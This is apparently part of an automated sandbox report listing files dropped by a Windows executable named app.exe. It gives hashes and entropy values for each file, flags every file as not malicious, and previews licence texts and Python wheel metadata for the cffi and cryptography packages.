                                                                                                                                                                                                          MD5:AB206F2943977256CA3A59E5961E3A4F
                                                                                                                                                                                                          SHA1:9C1DF49A8DBDC8496AC6057F886F5C17B2C39E3E
                                                                                                                                                                                                          SHA-256:B3B6EE98ACA14CF5BC9F3BC7897BC23934BF85FC4BC25B7506FE4CD9A767047A
                                                                                                                                                                                                          SHA-512:BACCC304B091A087B2300C10F6D18BE414ABB4C1575274C327104AABB5FDF975BA26A86E423FDA6BEFB5D7564EFFAC0C138EB1BAD2D2E226131E4963C7AAC5BD
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):27912
                                                                                                                                                                                                          Entropy (8bit):6.630573984882858
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:SQUbM4Oe59Ckb1hgmLNW1hWzXRm0GftpBjDm3SBulJr6:SRMq59Bb1jEAViFla2
                                                                                                                                                                                                          MD5:4DD7A61590D07500704E7E775255CB00
                                                                                                                                                                                                          SHA1:8B35EC4676BD96C2C4508DC5F98CA471B22DEED7
                                                                                                                                                                                                          SHA-256:A25D0654DEB0CEA1AEF189BA2174D0F13BDF52F098D3A9EC36D15E4BFB30C499
                                                                                                                                                                                                          SHA-512:1086801260624CF395BF971C9FD671ABDDCD441CCC6A6EAC55F277CCFBAB752C82CB1709C8140DE7B4B977397A31DA6C9C8B693AE92264EB23960C8B1E0993BD
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19720
                                                                                                                                                                                                          Entropy (8bit):6.972767516542363
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:wKwW1hWe0sngm0GftpBjaxm3S+crlndaVrQOpt:RVngVik5W
                                                                                                                                                                                                          MD5:595D79870970565BE93DB076AFBE73B5
                                                                                                                                                                                                          SHA1:EC96F7BEEAEC14D3B6C437B97B4A18A365534B9B
                                                                                                                                                                                                          SHA-256:FC50A37ACC35345C99344042D7212A4AE88AA52A894CDA3DCB9F6DB46D852558
                                                                                                                                                                                                          SHA-512:152849840A584737858FC5E15F0D7802786E823A13EC5A9FC30EE032C7681DEAF11C93A8CFFEAD82DC5F73F0CD6F517F1E83B56D61D0E770CBB20E1CFFF22840
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):23304
                                                                                                                                                                                                          Entropy (8bit):6.842580906884736
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:VtYr7zW1hW+Qim0GftpBjOIzpm3Sel4aRGWN:Vmr7W3fVigqpHi
                                                                                                                                                                                                          MD5:8B9B0D1C8B0E9D4B576D42C66980977A
                                                                                                                                                                                                          SHA1:A19ACEFA3F95D1B565650FDBC40EF98C793358E9
                                                                                                                                                                                                          SHA-256:371A44AB91614A8C26D159BEB872A7B43F569CB5FAC8ADA99ACE98F264A3B503
                                                                                                                                                                                                          SHA-512:4B1C5730A17118B7065FADA3B36944FE4E0260F77676B84453EE5042F6F952A51FD99DEBCA835066A6D5A61BA1C5E17247551340DD02D777A44BC1CAE84E6B5F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):24840
                                                                                                                                                                                                          Entropy (8bit):6.792113276202437
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:cZpFVhHW1hWdam0GftpBjFufm3SOFl4aRGWs:goNViuz/
                                                                                                                                                                                                          MD5:76E0A89C91A28CF7657779D998E679E5
                                                                                                                                                                                                          SHA1:982B5DA1C1F5B9D74AF6243885BCBA605D54DF8C
                                                                                                                                                                                                          SHA-256:0189CBD84DEA035763A7E52225E0F1A7DCEC402734885413ADD324BFFE688577
                                                                                                                                                                                                          SHA-512:D75D8798EA3C23B3998E8C3F19D0243A0C3A3262CFFD8BCEE0F0F0B75F0E990C9CE6644150D458E5702A8AA51B202734F7A9161E795F8121F061139AD2EA454F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):24840
                                                                                                                                                                                                          Entropy (8bit):6.781450882014829
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:L6S5yguNvZ5VQgx3SbwA71IkFhIFViahxeX:Ll5yguNvZ5VQgx3SbwA71I6yVNfy
                                                                                                                                                                                                          MD5:96DA689947C6E215A009B9C1ECA5AEC2
                                                                                                                                                                                                          SHA1:7F389E6F2D6E5BEB2A3BAF622A0C0EA24BC4DE60
                                                                                                                                                                                                          SHA-256:885309EB86DCCD8E234BA05E13FE0BF59AB3DB388EBFBF6B4FD6162D8E287E82
                                                                                                                                                                                                          SHA-512:8E86FA66A939FF3274C2147463899DF575030A575C8F01573C554B760A53B339127D0D967C8CF1D315428E16E470FA1CC9C2150BB40E9B980D4EBF32E226EE89
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):21256
                                                                                                                                                                                                          Entropy (8bit):6.916930865406901
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:nUW1hW23szm0GftpBjHCm3SVZkl4aRGWe:3N8zVipCxZxz
                                                                                                                                                                                                          MD5:6B33B34888CCECCA636971FBEA5E3DE0
                                                                                                                                                                                                          SHA1:EE815A158BAACB357D9E074C0755B6F6C286B625
                                                                                                                                                                                                          SHA-256:00AC02D39B7B16406850E02CA4A6101F45D6F7B4397CC9E069F2CE800B8500B9
                                                                                                                                                                                                          SHA-512:F52A2141F34F93B45B90EB3BBCDB64871741F2BD5FED22EAAF35E90661E8A59EBA7878524E30646206FC73920A188C070A38DA9245E888C52D25E36980B35165
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19208
                                                                                                                                                                                                          Entropy (8bit):7.018564704523169
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:RfVW1hWfFm0GftpBjaDRm3SY6vlgCohaQ:RfsQViklwHj
                                                                                                                                                                                                          MD5:54F27114EB0FDA1588362BB6B5567979
                                                                                                                                                                                                          SHA1:EAA07829D012206AC55FB1AF5CC6A35F341D22BE
                                                                                                                                                                                                          SHA-256:984306A3547BE2F48483D68D0466B21DDA9DB4BE304BEDC9FFDB953C26CAC5A1
                                                                                                                                                                                                          SHA-512:18D2BDCE558655F2088918241EFDF9297DFE4A14A5D8D9C5BE539334AE26A933B35543C9071CEDADA5A1BB7C2B20238E9D012E64EB5BBF24D0F6B0B726C0329D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1028082
                                                                                                                                                                                                          Entropy (8bit):5.5014629773472485
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24576:fhidpNtosQNRs54PK4IM7Vw59bfCEzXxTLEo0FR32a:fhidpNtosQNRs54PK4Ij9pTLp0/F
                                                                                                                                                                                                          MD5:13577A08B652108AB9A5B565C6DEA70F
                                                                                                                                                                                                          SHA1:FFF691B6E4D54E6FA86820027003F37DE870E675
                                                                                                                                                                                                          SHA-256:93FF50787EB8F2FF4FC6B739D4F25533954B04337E648BFF1BF89398F7CBE7E4
                                                                                                                                                                                                          SHA-512:ED5B297B17B00857DCE3FA6E8A1BE738CDC61C6E528C4CC2B90E533EC2369903ADF6281E2B0B1560B2B9B4F9CFDEDAA8D0EF6545CC575E74BF3926389D7B6829
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):31744
                                                                                                                                                                                                          Entropy (8bit):6.264879673315508
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:XKBxYvCc//KEdvX020YfLecJay5e0bxpJgLa0Mp8D0ekPwqOw7:zv3tdvk8Tle0gLa1SPd
                                                                                                                                                                                                          MD5:CF00C6C161757C4D8D22BF17454D81FC
                                                                                                                                                                                                          SHA1:09E58262814824182BDF7D5A003ADD397FA1E8DD
                                                                                                                                                                                                          SHA-256:BC04E7527F98B38BEFB68E96FEA1D25EB61E360398539D26D8CFCD7B910E0A61
                                                                                                                                                                                                          SHA-512:4A6AAD3798A76C38D15CEEBCE147D4E0F9AF231EC054CEDAB087F32F594768AF6BADDEE0B8748C3F2CAE820C863225EE3CC5E8DF0F0FE0A9E05D95746A090E00
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):285222
                                                                                                                                                                                                          Entropy (8bit):6.049584029751259
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:QW1H/M8f9R0mNpliXCRrwADwYCuMEigT/Q5MSRqNb7d8l:QWN/vRLNL4CRrBC5MWavd0
                                                                                                                                                                                                          MD5:B18E918767D99291F8771414B76A8E65
                                                                                                                                                                                                          SHA1:EA544791B23E4A8F47ACE99B9D08B3609D511293
                                                                                                                                                                                                          SHA-256:A59FDE883A0EF9D74AB9DAD009689E00173D28595B57416C98B2EE83280C6E4C
                                                                                                                                                                                                          SHA-512:78A4EAC65754FB8D37C1DA85534D6E1DD0EB2B3535EF59D75C34A91D716AFC94258599B1078C03A4B81E142945B13E671EC46B5F2FCB8C8C46150AE7506E0D8D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4
                                                                                                                                                                                                          Entropy (8bit):1.5
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:Mn:M
                                                                                                                                                                                                          MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                          SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                          SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                          SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:pip.
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1320
                                                                                                                                                                                                          Entropy (8bit):4.935991038897493
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..Except when otherwise stated (look for LICENSE files in directories or..information at the beginning of each file) all software and..documentation is licensed as follows: .... The MIT License.... Permission is hereby granted, free of charge, to any person .. obtaining a copy of this software and associated documentation .. files (the "Software"), to deal in the Software without .. restriction, including without limitation the rights to use, .. copy, modify, merge, publish, distribute, sublicense, and/or .. sell copies of the Software, and to permit persons to whom the .. Software is furnished to do so, subject to the following conditions:.... The above copyright notice and this permission notice shall be included .. in all copies or substantial portions of the Software..... THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS .. OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, .. FITNESS FOR A PARTIC
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1144
                                                                                                                                                                                                          Entropy (8bit):4.90107932083797
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Metadata-Version: 2.1.Name: cffi.Version: 1.15.1.Summary: Foreign Function Interface for Python calling C code..Home-page: http://cffi.readthedocs.org.Author: Armin Rigo, Maciej Fijalkowski.Author-email: python-cffi@googlegroups.com.License: MIT.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 2.Classifier: Programming Language :: Python :: 2.7.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.6.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: Implementation :: CPython.Classifier: Programming Language :: Python :: Implementation :: PyPy.Classifier: License :: OSI Approved :: MIT License.License-File: LICENSE.Requires-Dist: pycparser...CFFI.====..Foreign Function Interface for Python calling C code..Please s
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2884
                                                                                                                                                                                                          Entropy (8bit):5.799739537482471
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:_cffi_backend.cp38-win_amd64.pyd,sha256=ZLfjL9a0kvd2PZJyelwjgYzF2juXezJMpxEXrvmdxsc,181248..cffi-1.15.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cffi-1.15.1.dist-info/LICENSE,sha256=esEZUOct9bRcUXFqeyLnuzSzJNZ_Bl4pOBUt1HLEgV8,1320..cffi-1.15.1.dist-info/METADATA,sha256=KP4G3WmavRgDGwD2b8Y_eDsM1YeV6ckcG6Alz3-D8VY,1144..cffi-1.15.1.dist-info/RECORD,,..cffi-1.15.1.dist-info/WHEEL,sha256=M2GQ3lde8oJhlQPj2wbRvnqE3cuovPJasri5X5aCmck,100..cffi-1.15.1.dist-info/entry_points.txt,sha256=y6jTxnyeuLnL-XJcDv8uML3n6wyYiGRg8MTp_QGJ9Ho,75..cffi-1.15.1.dist-info/top_level.txt,sha256=rE7WR3rZfNKxWI9-jn6hsHCAl7MDkB-FmuQbxWjFehQ,19..cffi/__init__.py,sha256=uABQQ4lgzvhAvVhd1_ZA_oSO9T-O93qMod-rs0Ihjb8,527..cffi/__pycache__/__init__.cpython-38.pyc,,..cffi/__pycache__/api.cpython-38.pyc,,..cffi/__pycache__/backend_ctypes.cpython-38.pyc,,..cffi/__pycache__/cffi_opcode.cpython-38.pyc,,..cffi/__pycache__/commontypes.cpython-38.pyc,,..cffi/__pycache__/cparser.cpython-38.pyc,,..cff
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):100
                                                                                                                                                                                                          Entropy (8bit):5.060078225325273
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.37.1).Root-Is-Purelib: false.Tag: cp38-cp38-win_amd64..
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):75
                                                                                                                                                                                                          Entropy (8bit):4.3073102379831525
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[distutils.setup_keywords].cffi_modules = cffi.setuptools_ext:cffi_modules.
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19
                                                                                                                                                                                                          Entropy (8bit):3.260828171224456
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:_cffi_backend.cffi.
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4
                                                                                                                                                                                                          Entropy (8bit):1.5
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:pip.
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):329
                                                                                                                                                                                                          Entropy (8bit):4.603126991268486
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:This software is made available under the terms of *either* of the licenses..found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made..under the terms of *both* these licenses.....The code used in the OS random engine is derived from CPython, and is licensed..under the terms of the PSF License Agreement...
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11562
                                                                                                                                                                                                          Entropy (8bit):4.476412280491683
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.. Apache License.. Version 2.0, January 2004.. https://www.apache.org/licenses/.... TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.... 1. Definitions..... "License" shall mean the terms and conditions for use, reproduction,.. and distribution as defined by Sections 1 through 9 of this document..... "Licensor" shall mean the copyright owner or entity authorized by.. the copyright owner that is granting the License..... "Legal Entity" shall mean the union of the acting entity and all.. other entities that control, are controlled by, or are under common.. control with that entity. For the purposes of this definition,.. "control" means (i) the power, direct or indirect, to cause the.. direction or management of such entity, whether by contract or.. otherwise, or (ii) ownership of fifty percent (50%) or more of the.. outstanding shares, o
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1559
                                                                                                                                                                                                          Entropy (8bit):5.097091815591564
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:NOWJbPrYJ0NCPiB432sVoY32s3EiP3tQHy:gWJbPrYJUNu3J3zVSS
                                                                                                                                                                                                          MD5:07BFF60D258208652DF09D36F7F94844
                                                                                                                                                                                                          SHA1:E37EC74CF1EC6B540A511EA75E04C3429DB39C57
                                                                                                                                                                                                          SHA-256:661D18932DD84BB263A8EE418AB7774ED94EEC33C83FD1DB5B533F78EB774CA4
                                                                                                                                                                                                          SHA-512:049659D6AC6681E209F30E1A6A12BA6118BEB96F032FD3E2583686EA562068E311C61CCD0785B0FC343ECBA094955C972ABCF9AE9B0A4503C56131F1A59A6F83
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Copyright (c) Individual contributors...All rights reserved.....Redistribution and use in source and binary forms, with or without..modification, are permitted provided that the following conditions are met:.... 1. Redistributions of source code must retain the above copyright notice,.. this list of conditions and the following disclaimer..... 2. Redistributions in binary form must reproduce the above copyright.. notice, this list of conditions and the following disclaimer in the.. documentation and/or other materials provided with the distribution..... 3. Neither the name of PyCA Cryptography nor the names of its contributors.. may be used to endorse or promote products derived from this software.. without specific prior written permission.....THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND..ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED..WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2456
                                                                                                                                                                                                          Entropy (8bit):5.053763055088611
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:xUXkp7vXkzpXFlYPXc/XFbwDt3XF2iDPGkvAuXF1f0T2sMtQVHiioTxmynXh2XFQ:KXwDXklHYPXaAt3ZSkYuyCQ4hTcynx26
                                                                                                                                                                                                          MD5:36F8D9BAB4000E435033D3CDB2E85E9B
                                                                                                                                                                                                          SHA1:003076B91D93233F389AB5DB052C04386620BB76
                                                                                                                                                                                                          SHA-256:C2ED0F2724ACA6CEC716CE169FD22C91B79A21FF625C3725D5C71BE1A7977430
                                                                                                                                                                                                          SHA-512:48396B8D7DD14A10C3941788DFED9FF0699C413328FA086CF1D7DCB5E4ED538AEC98541A758B169E271C3DD9BE6056E2EEA0853A6F6DA9C44D865718425DBF9E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:1. This LICENSE AGREEMENT is between the Python Software Foundation ("PSF"), and.. the Individual or Organization ("Licensee") accessing and otherwise using Python.. 2.7.12 software in source or binary form and its associated documentation.....2. Subject to the terms and conditions of this License Agreement, PSF hereby.. grants Licensee a nonexclusive, royalty-free, world-wide license to reproduce,.. analyze, test, perform and/or display publicly, prepare derivative works,.. distribute, and otherwise use Python 2.7.12 alone or in any derivative.. version, provided, however, that PSF's License Agreement and PSF's notice of.. copyright, i.e., "Copyright . 2001-2016 Python Software Foundation; All Rights.. Reserved" are retained in Python 2.7.12 alone or in any derivative version.. prepared by Licensee.....3. In the event Licensee prepares a derivative work that is based on or.. incorporates Python 2.7.12 or any part thereof, and wants to make the.. derivative work
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5317
                                                                                                                                                                                                          Entropy (8bit):5.089791763663827
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:DD4FVZ6DWQIUQIhQIKQILbQIRIaMmPktjxsx/1AnivAEYaCjF0ErpklE2jQecwUM:4B6VcPuPfs/univAEYaCjF0ErpklE2j5
                                                                                                                                                                                                          MD5:7A1A0C8010E22C838731CF8728D4E70D
                                                                                                                                                                                                          SHA1:CFF29F6893C6F675A470AE568E19A2BF4394A7F4
                                                                                                                                                                                                          SHA-256:5BB15B05B1055ECCDE3ECC315757980589CD2CBC76219191DBCB022AF9739AFD
                                                                                                                                                                                                          SHA-512:D492F35BBA71FDC8CED8216B657382B6FEC3A4076CB8584088DAD3A29D543BBF8EFA2DACEB2AEBEE983B8ED7F95503B84767D982293CD21FA4C44C992349D7B3
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Metadata-Version: 2.1.Name: cryptography.Version: 36.0.2.Summary: cryptography is a package which provides cryptographic recipes and primitives to Python developers..Home-page: https://github.com/pyca/cryptography.Author: The Python Cryptographic Authority and individual contributors.Author-email: cryptography-dev@python.org.License: BSD or Apache License, Version 2.0.Project-URL: Documentation, https://cryptography.io/.Project-URL: Source, https://github.com/pyca/cryptography/.Project-URL: Issues, https://github.com/pyca/cryptography/issues.Project-URL: Changelog, https://cryptography.io/en/latest/changelog/.Platform: UNKNOWN.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: License :: OSI Approved :: BSD License.Classifier: Natural Language :: English.Classifier: Operating System :: MacOS :: MacOS X.Classifier: Operating System :: POSIX.Classifier: Operating Sy
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):15975
                                                                                                                                                                                                          Entropy (8bit):5.53707028238198
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:QX8UKV46ObUjxAsCjEaNfk3T2UbycOJZCBD9G/JLP:QXQII1LmJLP
                                                                                                                                                                                                          MD5:7B5C41217568A045545F76C7844EE9C3
                                                                                                                                                                                                          SHA1:6B15B0B39A6678CADD6B3A867B92396027ABCC4F
                                                                                                                                                                                                          SHA-256:FD17912CEE39BBA4A30357365DCB31D30F72CF89D47EC96B943F0FE158AE9D11
                                                                                                                                                                                                          SHA-512:171E16E21B40A5201F4517D7A807368A76CD7BC13DC2164EEB266FD5ADB1E67DE2A9BFFE35E0974709B39015A8482383DBF532D623EDBE57773E5FD84A1EE3A3
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:cryptography-36.0.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cryptography-36.0.2.dist-info/LICENSE,sha256=lwxrwPq1kRegtl6abV94epkb6-gq_zKgHE4abgL04QU,329..cryptography-36.0.2.dist-info/LICENSE.APACHE,sha256=6N4ac5NFfpyIdot45rp5BiL777BAzkgZTCyw8bbU6f8,11562..cryptography-36.0.2.dist-info/LICENSE.BSD,sha256=Zh0Yky3YS7JjqO5Bird3TtlO7DPIP9HbW1M_eOt3TKQ,1559..cryptography-36.0.2.dist-info/LICENSE.PSF,sha256=wu0PJySsps7HFs4Wn9IskbeaIf9iXDcl1ccb4aeXdDA,2456..cryptography-36.0.2.dist-info/METADATA,sha256=W7FbBbEFXszePswxV1eYBYnNLLx2IZGR28sCKvlzmv0,5317..cryptography-36.0.2.dist-info/RECORD,,..cryptography-36.0.2.dist-info/WHEEL,sha256=nYCSW5p8tLyDU-wbqo3uRlCluAzwxLmyyRK2pVs4-Ag,100..cryptography-36.0.2.dist-info/top_level.txt,sha256=zYbdX67v4JFZPfsaNue7ZV4-mgoRqYCAhMsNgt22LqA,22..cryptography/__about__.py,sha256=mvSEuUyFuzWcY4NYDTV5O3GQIAuThDJgh7Zh8frIdzo,432..cryptography/__init__.py,sha256=owfnhPuteOJ5wJoJrUfwZO_G-Xset6L0eZ5AWxp6thI,364..cryptography/__pycach
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):100
                                                                                                                                                                                                          Entropy (8bit):5.000336540814903
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:RtEeX7MWcSlViZHKRRP+tkKc5vKQLn:RtBMwlViojWK/SQLn
                                                                                                                                                                                                          MD5:FD7C45A29F7B2371E832F4D0A8B2DB64
                                                                                                                                                                                                          SHA1:D2227C6F4CD8A948E4A4CA6BF2592E9700383EB1
                                                                                                                                                                                                          SHA-256:9D80925B9A7CB4BC8353EC1BAA8DEE4650A5B80CF0C4B9B2C912B6A55B38F808
                                                                                                                                                                                                          SHA-512:AEF644A24B948DC30C2097D53CD5D412C85958E7846720F4E3693F42924597F6924BD24E1B083B2EC57E7BA08C54DBDCA3C1AE73AC2322CD1A575F06BB4D1D90
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.37.1).Root-Is-Purelib: false.Tag: cp36-abi3-win_amd64..
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):22
                                                                                                                                                                                                          Entropy (8bit):3.7887549139935035
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:DA1JEOv:DUVv
                                                                                                                                                                                                          MD5:6DB3CE9E78C8F56F58CDF1B221C0884B
                                                                                                                                                                                                          SHA1:D8D1BA8EE6C2A5EED9CB39B170EE08012AB41E11
                                                                                                                                                                                                          SHA-256:CD86DD5FAEEFE091593DFB1A36E7BB655E3E9A0A11A9808084CB0D82DDB62EA0
                                                                                                                                                                                                          SHA-512:6F8AB5DA07A237C2BD6DA073A66125EB0CA754389CB84671D68D0DA4122AD6DDA58336900B1100D235814B16EFB970A2C3FBAF91B82366808DAA81A63EAE31AE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:_openssl.cryptography.
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
